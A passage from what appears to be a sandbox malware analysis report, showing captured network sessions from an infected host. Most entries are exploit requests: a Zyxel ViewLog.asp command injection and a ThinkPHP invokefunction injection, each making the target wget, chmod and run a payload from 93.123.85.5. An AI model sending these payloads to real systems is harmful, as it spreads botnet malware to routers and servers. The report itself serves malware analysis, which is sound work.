                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:00.837815046 CET14919OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:33.857435942 CET19045OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              534192.168.2.235127231.136.208.458080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:29.260628939 CET10990OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:30.281675100 CET11124OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:32.297437906 CET11365OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:36.520874977 CET11894OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:44.711863041 CET12881OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:00.837795973 CET14919OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:33.857405901 CET19044OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              535192.168.2.233632631.129.204.2038080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:29.273737907 CET10991OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:29.616317034 CET11013INHTTP/1.1 405 Not Allowed
                                                              Server: Web server
                                                              Date: Mon, 13 Nov 2023 21:19:27 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 155
                                                              Connection: keep-alive
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>Web server</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              536192.168.2.234367295.101.0.1380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:29.373814106 CET11003OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:29.660804033 CET11019INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:19:29 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:29 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 63 62 30 66 37 34 38 26 23 34 36 3b 31 36 39 39 39 31 30 33 36 39 26 23 34 36 3b 31 62 65 35 35 34 36 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;9cb0f748&#46;1699910369&#46;1be55464</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              537192.168.2.234615494.247.62.828080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:29.406951904 CET11005OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:29.886533976 CET11115INHTTP/1.0 302 Redirect


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              538192.168.2.234075294.131.62.1538080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:29.447438002 CET11006OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:29.657972097 CET11015INHTTP/1.1 400 Bad Request
                                                              Server: squid/6.0.0-20220501-re899e0c27
                                                              Mime-Version: 1.0
                                                              Date: Mon, 13 Nov 2023 21:19:29 GMT
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Length: 3574
                                                              X-Squid-Error: ERR_INVALID_URL 0
                                                              Vary: Accept-Language
                                                              Content-Language: en
                                                              Cache-Status: ezproxies.com
                                                              Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              539192.168.2.233424095.105.250.15880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:29.469444990 CET11006OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:29.807631969 CET11089INHTTP/1.1 400 Bad Request
                                                              Connection: close
                                                              Content-Type: text/plain
                                                              Transfer-Encoding: chunked
                                                              Nov 13, 2023 22:19:29.807643890 CET11089INData Raw: 42 0d 0a 42 61 64 20 52 65 71 75 65 73 74 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: BBad Request0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              54192.168.2.235674031.128.207.2078080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:17.015737057 CET2200OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:17.387397051 CET2210INHTTP/1.1 200 OK
                                                              Content-Security-Policy: default-src *; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; frame-ancestors 'self'
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Content-Type-Options: nosniff
                                                              Date: Mon, 13 Nov 2023 21:18:17 GMT
                                                              Etag: "5fec3572.1676"
                                                              Content-Type: text/html
                                                              Content-Length: 1676
                                                              Connection: close
                                                              Accept-Ranges: bytes


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              540192.168.2.235455495.165.187.19080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:29.483385086 CET11007OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              541192.168.2.235497231.136.56.2148080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:29.586394072 CET11010OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:30.569653034 CET11137OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:32.553409100 CET11379OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:36.520859003 CET11893OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:44.455879927 CET12850OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:00.325752020 CET14878OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:31.809598923 CET18867OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              542192.168.2.235038431.136.249.1788080
